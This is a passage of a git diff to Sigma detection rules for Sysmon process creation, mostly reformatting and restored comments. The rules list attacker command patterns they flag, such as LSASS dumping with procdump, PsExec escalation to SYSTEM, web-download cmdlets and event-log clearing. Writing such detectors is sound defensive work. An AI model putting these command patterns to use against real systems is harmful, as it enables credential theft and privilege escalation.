CommandLine|contains: \netlogon\ filter2: - - Image|endswith: \explorer.exe - - OriginalFileName: explorer.exe + - Image|endswith: \explorer.exe + - OriginalFileName: explorer.exe condition: process_creation and (selection and not 1 of filter*) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml index 6dd5d502b..321f1a566 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml @@ -1,9 +1,7 @@ title: Weak or Abused Passwords In CLI id: 91edcfb1-2529-4ac2-9ecc-7617f895c7e4 status: test -description: Detects weak passwords or often abused passwords (seen used by threat - actors) via the CLI. An example would be a threat actor creating a new user via - the net command and providing the password inline +description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ @@ -23,9 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # Add more passwords - Asd123.aaaa - - password123 + - password123 # Also covers PASSWORD123123! as seen in https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/ - '123456789' - P@ssw0rd! - Decryptme diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml index 33bf366ac..c6fdcc67b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml @@ -1,21 +1,19 @@ title: Usage Of Web Request Commands And Cmdlets id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d related: - - id: 1139d2e2-84b1-4226-b445-354492eba8ba - type: similar - - id: f67dbfce-93bc-440d-86ad-a95ae8858c90 - type: obsoletes - - id: cd5c8085-4070-4e22-908d-a5b3342deb74 - type: obsoletes + - id: 1139d2e2-84b1-4226-b445-354492eba8ba + type: similar + - id: f67dbfce-93bc-440d-86ad-a95ae8858c90 + type: obsoletes + - id: cd5c8085-4070-4e22-908d-a5b3342deb74 + type: obsoletes status: test -description: Detects the use of various web request commands with commandline tools - and Windows PowerShell cmdlets (including aliases) via CommandLine +description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine references: - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell - https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps -author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin - Songer @austinsonger +author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger date: 2019/10/24 modified: 2023/01/10 tags: @@ -30,7 +28,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - '[System.Net.WebRequest]::create' - 'curl ' - Invoke-RestMethod diff --git a/sigma/sysmon/process_creation/proc_creation_win_susp_whoami_as_param.yml b/sigma/sysmon/process_creation/proc_creation_win_susp_whoami_as_param.yml index 74c762cf2..0c51cb9f5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_susp_whoami_as_param.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_susp_whoami_as_param.yml @@ -1,8 +1,7 @@ title: WhoAmI as Parameter id: e9142d84-fbe0-401d-ac50-3e519fb00c89 status: test -description: Detects a suspicious process command line that uses whoami as first parameter - (as e.g. used by EfsPotato) +description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) references: - https://twitter.com/blackarrowsec/status/1463805700602224645?s=12 author: Florian Roth (Nextron Systems) @@ -21,7 +20,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: .exe whoami + CommandLine|contains: .exe whoami condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml b/sigma/sysmon/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml index ee3a56368..c640be7fd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_svchost_execution_with_no_cli_flags.yml @@ -1,9 +1,7 @@ title: Suspect Svchost Activity id: 16c37b52-b141-42a5-a3ea-bbe098444397 status: test -description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments - and is normally observed when a malicious process spawns the process and injects - code into the process memory space. +description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. references: - https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2 author: David Burkett, @signalblur @@ -22,13 +20,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|endswith: svchost.exe + CommandLine|endswith: svchost.exe Image|endswith: \svchost.exe filter: - - ParentImage|endswith: - - \rpcnet.exe - - \rpcnetp.exe - - CommandLine: null + - ParentImage|endswith: + - \rpcnet.exe + - \rpcnetp.exe + - CommandLine: # no CommandLine value available condition: process_creation and (selection and not filter) fields: - CommandLine diff --git a/sigma/sysmon/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml b/sigma/sysmon/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml index a0a5a4c6e..b1d415bf8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_svchost_termserv_proc_spawn.yml @@ -1,8 +1,7 @@ title: Terminal Service Process Spawn id: 1012f107-b8f1-4271-af30-5aed2de89b39 status: test -description: Detects a process spawned by the terminal service server process (this - could be an indicator for an exploitation of CVE-2019-0708) +description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) references: - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/ author: Florian Roth (Nextron Systems) @@ -33,7 +32,7 @@ detection: - :\Windows\System32\wininit.exe - :\Windows\System32\winlogon.exe filter_null: - Image: null + Image: condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml b/sigma/sysmon/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml index 5415bd301..8d4a70779 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_svchost_uncommon_parent_process.yml @@ -27,7 +27,7 @@ detection: - \services.exe - \TiWorker.exe filter_main_parent_null: - ParentImage: null + ParentImage: filter_main_parent_empty: ParentImage: - '-' diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml index f5e4321e2..1f2d21237 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml @@ -1,16 +1,13 @@ title: Permission Check Via Accesschk.EXE id: c625d754-6a3d-4f65-9c9a-536aea960d37 status: test -description: Detects the usage of the "Accesschk" utility, an access and privilege - audit tool developed by SysInternal and often being abused by attacker to verify - process privileges +description: Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges references: - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43 - https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW - https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat - https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat -author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2020/10/13 modified: 2023/02/20 tags: @@ -25,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Product|endswith: AccessChk - - Description|contains: Reports effective permissions - - Image|endswith: - - \accesschk.exe - - \accesschk64.exe - - OriginalFileName: accesschk.exe + - Product|endswith: AccessChk + - Description|contains: Reports effective permissions + - Image|endswith: + - \accesschk.exe + - \accesschk64.exe + - OriginalFileName: accesschk.exe selection_cli: - CommandLine|contains: + CommandLine|contains: # These are the most common flags used with this tool. You could add other combinations if needed - 'uwcqv ' - 'kwsu ' - 'qwsu ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml index 869c3d095..546863367 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_execution.yml @@ -1,11 +1,10 @@ title: Active Directory Database Snapshot Via ADExplorer id: 9212f354-7775-4e28-9c9f-8f0a4544e664 related: - - id: ef61af62-bc74-4f58-b49b-626448227652 - type: derived + - id: ef61af62-bc74-4f58-b49b-626448227652 + type: derived status: experimental -description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" - flag in order to save a local copy of the active directory database. +description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database. references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Nasreddine Bencherchali (Nextron Systems) @@ -23,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ADExplorer.exe - - OriginalFileName: AdExp + - Image|endswith: \ADExplorer.exe + - OriginalFileName: AdExp selection_cli: - CommandLine|contains: snapshot + CommandLine|contains: snapshot condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml index f67c27195..5773fdbbc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml @@ -1,12 +1,10 @@ title: Suspicious Active Directory Database Snapshot Via ADExplorer id: ef61af62-bc74-4f58-b49b-626448227652 related: - - id: 9212f354-7775-4e28-9c9f-8f0a4544e664 - type: derived + - id: 9212f354-7775-4e28-9c9f-8f0a4544e664 + type: derived status: experimental -description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" - flag in order to save a local copy of the active directory database to a suspicious - directory. +description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory. references: - https://www.documentcloud.org/documents/5743766-Global-Threat-Report-2019.html author: Nasreddine Bencherchali (Nextron Systems) @@ -24,12 +22,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ADExplorer.exe - - OriginalFileName: AdExp + - Image|endswith: \ADExplorer.exe + - OriginalFileName: AdExp selection_flag: - CommandLine|contains: snapshot + CommandLine|contains: snapshot selection_paths: - CommandLine|contains: + CommandLine|contains: + # TODO: Add more suspicious paths - \Downloads\ - \Users\Public\ - \AppData\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_eula_accepted.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_eula_accepted.yml index c93ebdf01..c351e91f7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_eula_accepted.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_eula_accepted.yml @@ -1,11 +1,10 @@ title: Potential Execution of Sysinternals Tools id: 7cccd811-7ae9-4ebe-9afd-cb5c406b824b related: - - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 - type: derived + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + type: derived status: test -description: Detects command lines that contain the 'accepteula' flag which could - be a sign of execution of one of the Sysinternals tools +description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools references: - https://twitter.com/Moti_B/status/1008587936735035392 author: Markus Neis @@ -23,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - ' -accepteula' - ' /accepteula' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_execution.yml index ccdaa348a..ea65ea80b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_execution.yml @@ -17,10 +17,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: - - \livekd.exe - - \livekd64.exe - - OriginalFileName: livekd.exe + - Image|endswith: + - \livekd.exe + - \livekd64.exe + - OriginalFileName: livekd.exe condition: process_creation and selection falsepositives: - Administration and debugging activity (must be investigated) diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml index 7501f2926..2b34f7d35 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml @@ -1,8 +1,7 @@ title: Kernel Memory Dump Via LiveKD id: c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2 status: experimental -description: Detects execution of LiveKD with the "-m" flag to potentially dump the - kernel memory +description: Detects execution of LiveKD with the "-m" flag to potentially dump the kernel memory references: - https://learn.microsoft.com/en-us/sysinternals/downloads/livekd - https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/ @@ -20,12 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \livekd.exe - - \livekd64.exe - - OriginalFileName: livekd.exe + - Image|endswith: + - \livekd.exe + - \livekd64.exe + - OriginalFileName: livekd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /m' - ' -m' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml index f501a7706..1ec42c974 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_evasion.yml @@ -1,8 +1,7 @@ title: Potential SysInternals ProcDump Evasion id: 79b06761-465f-4f88-9ef2-150e24d3d737 status: test -description: Detects uses of the SysInternals ProcDump utility in which ProcDump or - its output get renamed, or a dump file is moved or copied to a different name +description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name references: - https://twitter.com/mrd0x/status/1480785527901204481 author: Florian Roth (Nextron Systems) @@ -21,24 +20,23 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - copy procdump - move procdump selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - '.dmp ' - CommandLine|contains: + CommandLine|contains: - 2.dmp - lsass - out.dmp selection_3: - CommandLine|contains: - - copy lsass.exe_ - - move lsass.exe_ + CommandLine|contains: + - copy lsass.exe_ # procdump default pattern e.g. lsass.exe_220111_085234.dmp + - move lsass.exe_ # procdump default pattern e.g. lsass.exe_220111_085234.dmp condition: process_creation and (1 of selection_*) falsepositives: - - False positives are expected in cases in which ProcDump just gets copied to - a different directory without any renaming + - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml index 8894bbe97..96bbe695d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_procdump_lsass.yml @@ -1,13 +1,9 @@ title: Potential LSASS Process Dump Via Procdump id: 5afee48e-67dd-4e03-a783-f74259dcf998 status: stable -description: 'Detects suspicious uses of the SysInternals Procdump utility by using - a special command line parameter in combination with the lsass.exe process. - - This way we are also able to catch cases in which the attacker has renamed the - procdump executable. - - ' +description: | + Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. + This way we are also able to catch cases in which the attacker has renamed the procdump executable. references: - https://learn.microsoft.com/en-us/sysinternals/downloads/procdump author: Florian Roth (Nextron Systems) @@ -28,11 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_flags: - CommandLine|contains: + CommandLine|contains: - ' -ma ' - ' /ma ' selection_process: - CommandLine|contains: ' ls' + CommandLine|contains: ' ls' # Short for lsass condition: process_creation and (all of selection*) falsepositives: - Unlikely, because no one should dump an lsass process memory diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_execution.yml index 0b8218281..12f7ffbe0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_execution.yml @@ -20,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \psexec.exe - - OriginalFileName: psexec.c + - Image|endswith: \psexec.exe + - OriginalFileName: psexec.c condition: process_creation and selection falsepositives: - Administrative scripts. diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml index 1e6c87ac5..8fb18aaee 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml @@ -1,11 +1,10 @@ title: PsExec/PAExec Escalation to LOCAL SYSTEM id: 8834e2f7-6b4b-4f09-8906-d2276470ee23 related: - - id: 207b0396-3689-42d9-8399-4222658efc99 - type: similar + - id: 207b0396-3689-42d9-8399-4222658efc99 # Generic rule based on similar cli flags + type: similar status: test -description: Detects suspicious commandline flags used by PsExec and PAExec to escalate - a command line to LOCAL_SYSTEM rights +description: Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ @@ -24,8 +23,12 @@ detection: process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational - selection_sys: - CommandLine|contains: + selection_sys: # Escalation to LOCAL_SYSTEM + CommandLine|contains: + # Note that you don't need to add the ".exe" part when using psexec/paexec + # The "-" can also be replaced with "/" + # The order of args isn't important + # "cmd" can be replaced by "powershell", "pwsh" or any other console like software - ' -s cmd' - ' /s cmd' - ' -s -i cmd' @@ -36,6 +39,7 @@ detection: - ' /i /s cmd' - ' -i /s cmd' - ' /i -s cmd' + # Pwsh (For PowerShell 7) - ' -s pwsh' - ' /s pwsh' - ' -s -i pwsh' @@ -46,6 +50,7 @@ detection: - ' /i /s pwsh' - ' -i /s pwsh' - ' /i -s pwsh' + # PowerShell (For PowerShell 5) - ' -s powershell' - ' /s powershell' - ' -s -i powershell' @@ -57,15 +62,13 @@ detection: - ' -i /s powershell' - ' /i -s powershell' selection_other: - CommandLine|contains: + CommandLine|contains: - psexec - paexec - accepteula condition: process_creation and (all of selection_*) falsepositives: - - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance - purposes (rare) - - Users that debug Microsoft Intune issues using the commands mentioned in the - official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + - Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare) + - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml index e471a6c58..ba3cc2386 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml @@ -1,8 +1,7 @@ title: Potential PsExec Remote Execution id: ea011323-7045-460b-b2d7-0f7442ea6b38 status: test -description: Detects potential psexec command that initiate execution on a remote - systems via common commandline flags used by the utility +description: Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.poweradmin.com/paexec/ @@ -21,7 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + # Accepting EULA in commandline - often used in automated attacks + CommandLine|contains|all: - accepteula - ' -u ' - ' -p ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc.yml index 7de8a54f3..f26ab4ef8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc.yml @@ -1,11 +1,10 @@ title: PsExec Service Execution id: fdfcbd78-48f1-4a4b-90ac-d82241e368c5 related: - - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba - type: obsoletes + - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba + type: obsoletes status: test -description: Detects launch of the PSEXESVC service, which means that this system - was the target of a psexec remote execution +description: Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.youtube.com/watch?v=ro2QuZTIMBM @@ -23,8 +22,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image: C:\Windows\PSEXESVC.exe - - OriginalFileName: psexesvc.exe + - Image: C:\Windows\PSEXESVC.exe + - OriginalFileName: psexesvc.exe condition: process_creation and selection falsepositives: - Legitimate administrative tasks diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml index b5e7f2573..1da10eeeb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml @@ -1,13 +1,10 @@ title: PsExec Service Child Process Execution as LOCAL SYSTEM id: 7c0dcd3d-acf8-4f71-9570-f448b0034f94 related: - - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba - type: similar + - id: fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba + type: similar status: test -description: Detects suspicious launch of the PSEXESVC service on this system and - a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started - a command on this system running it with highest privileges and not only the privileges - of the login user account (e.g. the administrator account) +description: Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account) references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec author: Florian Roth (Nextron Systems) @@ -25,12 +22,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: ParentImage: C:\Windows\PSEXESVC.exe - User|contains: + User|contains: # covers many language settings - AUTHORI - AUTORI condition: process_creation and selection falsepositives: - - Users that debug Microsoft Intune issues using the commands mentioned in the - official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension + - Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psloglist.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psloglist.yml index 856f65740..2a1b5a389 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psloglist.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psloglist.yml @@ -1,8 +1,7 @@ title: Suspicious Use of PsLogList id: aae1243f-d8af-40d8-ab20-33fc6d0c55bc status: test -description: Detects usage of the PsLogList utility to dump event log in order to - extract admin accounts and perform account discovery or delete events logs +description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs references: - https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/ - https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos @@ -25,26 +24,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - OriginalFileName: psloglist.exe - - Image|endswith: - - \psloglist.exe - - \psloglist64.exe + - OriginalFileName: psloglist.exe + - Image|endswith: + - \psloglist.exe + - \psloglist64.exe selection_cli_eventlog: - CommandLine|contains: + CommandLine|contains: - ' security' - ' application' - ' system' selection_cli_flags: - CommandLine|contains: + CommandLine|contains: - ' -d' - ' /d' - ' -x' - ' /x' - ' -s' - ' /s' - - ' -c' + - ' -c' # Clear event log after displaying - ' /c' - - ' -g' + - ' -g' # Export an event log as an evt file. - ' /g' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psservice.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psservice.yml index 7e60dd804..72a086b82 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psservice.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_psservice.yml @@ -1,8 +1,7 @@ title: Sysinternals PsService Execution id: 3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f status: test -description: Detects usage of Sysinternals PsService which can be abused for service - reconnaissance and tampering +description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psservice author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: psservice.exe - - Image|endswith: - - \PsService.exe - - \PsService64.exe + - OriginalFileName: psservice.exe + - Image|endswith: + - \PsService.exe + - \PsService64.exe condition: process_creation and selection falsepositives: - Legitimate use of PsService by an administrator diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml index 9ae3a109a..8447fccfd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml @@ -1,11 +1,10 @@ title: Sysinternals PsSuspend Execution id: 48bbc537-b652-4b4e-bd1d-281172df448f related: - - id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 - type: similar + - id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 + type: similar status: experimental -description: Detects usage of Sysinternals PsSuspend which can be abused to suspend - critical processes +description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes references: - https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend - https://twitter.com/0gtweet/status/1638069413717975046 @@ -24,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: pssuspend.exe - - Image|endswith: - - \pssuspend.exe - - \pssuspend64.exe + - OriginalFileName: pssuspend.exe + - Image|endswith: + - \pssuspend.exe + - \pssuspend64.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml index 4e21e330d..6c35994b8 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml @@ -1,11 +1,10 @@ title: Sysinternals PsSuspend Suspicious Execution id: 4beb6ae0-f85b-41e2-8f18-8668abc8af78 related: - - id: 48bbc537-b652-4b4e-bd1d-281172df448f - type: similar + - id: 48bbc537-b652-4b4e-bd1d-281172df448f # Basic Execution + type: similar status: experimental -description: Detects suspicious execution of Sysinternals PsSuspend, where the utility - is used to suspend critical processes such as AV or EDR to bypass defenses +description: Detects suspicious execution of Sysinternals 